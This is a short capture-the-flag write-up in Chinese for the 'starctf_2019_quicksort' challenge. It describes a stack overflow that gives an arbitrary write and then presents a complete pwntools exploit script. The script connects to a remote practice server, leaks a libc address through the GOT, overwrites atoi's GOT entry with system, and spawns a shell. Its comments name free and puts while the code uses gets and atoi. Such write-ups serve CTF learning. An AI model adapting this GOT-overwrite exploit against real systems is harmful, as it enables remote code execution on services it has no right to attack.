starctf_2019_quicksort
首先,检查一下程序的保护机制
然后,我们用IDA分析一下,栈溢出,可以将ptr指针覆盖掉,因此,我们可以任意地址写。
那么,我们可以将free的got表修改为main函数,这样就可以进行多次利用,同时后面的printf可以泄露地址
#coding:utf8
from pwn import *
from LibcSearcher import *
#sh = process('./starctf_2019_quicksort',env={'LD_PRELOAD':'./libc-2.23_x86.so'})
sh = remote('node3.buuoj.cn',26439)
elf = ELF('./starctf_2019_quicksort')
libc = ELF('./libc-2.23_x86.so')
gets_got = elf.got['gets']
atoi_got = elf.got['atoi']
vuln_addr = 0x08048816
sh.sendlineafter('sort?','1')
#修改free的got表为main,同时泄露puts的地址
payload = str(vuln_addr).ljust(0x10,'\x00') + p32(1)*2 + p32(0) + p32(gets_got)
sh.sendlineafter('number:',payload)
sh.recvuntil('result:\n')
gets_addr = int(sh.recvuntil('\n',drop = True)) + 0x100000000
libc_base = gets_addr - libc.sym['gets']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
sh.sendlineafter('sort?','1')
payload = str(system_addr - 0x100000000).ljust(0x10,'\x00') + p32(1)*2 + p32(0) + p32(atoi_got - 0x4)
sh.sendlineafter('number:',payload)
#getshell
sh.sendlineafter('sort?','1')
sh.sendlineafter('number:','/bin/sh\x00')
sh.interactive()